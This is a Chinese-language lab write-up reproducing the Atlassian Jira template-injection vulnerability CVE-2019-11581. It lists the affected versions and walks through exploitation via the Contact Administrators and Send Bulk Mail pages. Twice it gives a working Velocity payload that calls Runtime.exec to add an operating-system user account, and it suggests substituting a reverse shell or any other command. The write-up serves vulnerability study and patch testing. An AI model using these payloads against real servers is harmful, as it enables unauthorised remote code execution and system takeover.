访问以下两种url

无需管理员账户权限:http://ip:port/secure/ContactAdministrators!default.jspa

需管理员账户权限:http://ip:port/secure/admin/SendBulkMail!default.jspa 

如果出现以下运行版本号则为存在漏洞。


漏洞影响范围
AtlassianJira 4.4.x
AtlassianJira 5.x.x
AtlassianJira 6.x.x
AtlassianJira 7.0.x
AtlassianJira 7.1.x
AtlassianJira 7.2.x
AtlassianJira 7.3.x
AtlassianJira 7.4.x
AtlassianJira 7.5.x
AtlassianJira 7.6.x < 7.6.14
AtlassianJira 7.7.x
AtlassianJira 7.8.x
AtlassianJira 7.9.x
AtlassianJira 7.10.x
AtlassianJira 7.11.x
AtlassianJira 7.12.x
AtlassianJira 7.13.x < 7.13.5
AtlassianJira 8.0.x < 8.0.3
AtlassianJira 8.1.x < 8.1.2
AtlassianJira 8.2.x < 8.2.3


漏洞利用

0x00 漏洞利用条件

联系管理员必须开启 || 知道后台管理员账号密码

0x01 环境准备:

腾讯云服务器(已解封25端口发邮件,注意必须要能发送邮件的服务器):118.*.*.*

Atlassian JIRAv6.3.6(存在漏洞版本)

Atlassian JIRAv6.3.6下载地址:https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.3.6-x64.exe


安装过程不再描述,有问题可以回复,注意,到了邮件配置那一步经尽量选以后(默认就是),然后进入后台配置。


0x02 确认未登陆状态下漏洞存在

访问如下URL

无需管理员账户权限:http://ip:port/secure/ContactAdministrators!default.jspa

如果提示如图,这种说明没有配置联系管理员,无法触发漏洞。。。

点击查看原图

请登陆后台开启联系管理员,配置地址如下

配置地址:http://10.10.20.116:8080/secure/admin/EditApplicationProperties!default.jspa

默认是关闭的,需要配置了STMP发信后才能开启,配置STMP的时候可以测试连接,服务器必须开25端口,不然不能发邮件。。。

下图是开启成功。

2019081302.png

0x03 未登陆状态下触发漏洞

访问118.*.*.*:8080/secure/ContactAdministrators!default.jspa

在Subject填入payload,注意,我这里环境是windows机器,所以可以添加账号观察,Linux可以用反弹shell的代码等等,反正换成自己想执行的命令。


1 $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user ximcx abc@ABC123 /add').waitFor()


2019081303.png

2019081304.png

发送了后可能会等一会儿,因为要加入邮件队列。这时候再上服务器执行net user查看,发现正是刚刚执行命令添加的账户。

2019081305.png

0x04 登陆管理员账号触发漏洞

登陆管理员账号,然后访问如下URL

http://118.*.*.*:8080/secure/admin/SendBulkMail!default.jspa

填入payload,如下,注意执行命令添加账号的账户名


1 $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user ximcx2 abc@ABC123 /add').waitFor()


2019081306.png

2019081307.png


参考文章:

https://mp.weixin.qq.com/s/5FzMMTg15GsmyUhoiXEriQ

https://github.com/jas502n/CVE-2019-11581

https://paper.seebug.org/982/